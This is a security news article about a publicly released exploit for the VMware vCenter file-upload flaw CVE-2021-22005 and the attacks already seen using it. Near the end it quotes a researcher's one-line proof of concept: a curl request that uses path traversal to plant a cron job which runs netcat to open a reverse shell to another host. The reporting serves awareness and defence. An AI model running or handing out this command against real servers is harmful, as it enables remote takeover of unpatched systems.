BOOK THIS SPACE FOR AD
ARTICLE ADAn exploit for the recently disclosed CVE-2021-22005 vulnerability in VMware vCenter was publicly released, threat actors are already using it.
A working exploit for the CVE-2021-22005 vulnerability in VMware vCenter is publicly available, and attackers are already attempting to use it in the wild.
VMware recently addressed the critical arbitrary file upload vulnerability CVE-2021-22005, it impacts appliances running default vCenter Server 6.7 and 7.0 deployments.
vCenter Server is the centralized management utility for VMware, and is used to manage virtual machines, multiple ESXi hosts, and all dependent components from a single centralized location.
The vulnerability is due to the way it handles session tokens.
“VMware has released patches that address a new critical security advisory, VMSA-2021-0020. This needs your immediate attention if you are using vCenter Server.” reads the advisory published by the virtualization giant. “The VMSA outlines a number of issues that are resolved in this patch release. The most urgent addresses CVE-2021-22005, a file upload vulnerability that can be used to execute commands and software on the vCenter Server Appliance. This vulnerability can be used by anyone who can reach vCenter Server over the network to gain access, regardless of the configuration settings of vCenter Server.”
While the company urges its customers to immediately apply the security patch to fix the vulnerability, threat actors started scanning the internet for vulnerable systems.
The threat intelligence firm Bad Packets reported that scanning activity for this vulnerability started immediately after the virtualization giant addressed the flaw.
Researchers from BleepingComputer also reported that threat actors have started to exploit CVE-2021-22005 using code released by security researcher Jang.
VMware confirmed it is aware of threat actors exploiting the flaw in the wild.
“The VMSA outlines a number of issues that are resolved in this patch release. The most urgent addresses CVE-2021-22005, a file upload vulnerability that can be used to execute commands and software on the vCenter Server Appliance. This vulnerability can be used by anyone who can reach vCenter Server over the network to gain access, regardless of the configuration settings of vCenter Server.” reads a post published by VMWare.
Now a different exploit code for the vulnerability is circulating online, it allows remote attackers to open a reverse shell on a vulnerable system and execute arbitrary code.
The researcher wvu released an unredacted PoC exploit for CVE-2021-22005 that works against systems with the Customer Experience Improvement Program (CEIP) component enabled (default configuration).
CVE-2021-22005: Exploitation in the wild confirmed. Unredacted RCE PoC against CEIP below.
curl -kv "https://172.16.57.2/analytics/telemetry/ph/api/hyper/send?_c=&_i=/../../../../../../etc/cron.d/$RANDOM" -H Content-Type: -d "* * * * * root nc -e /bin/sh 172.16.57.1 4444" https://t.co/wi08brjl3r pic.twitter.com/bwjMA21ifA
To be clear, these particular endpoints are exploitable only if CEIP is enabled, which is an *opt-out* feature.
— wvu (@wvuuuuuuuuuuuuu) September 24, 2021Experts have no doubts, the availability of the exploit will cause a spike in the number of attacks targeting systems vulnerable to this vulnerability.
Follow me on Twitter: @securityaffairs and Facebook
(SecurityAffairs – hacking, VMware)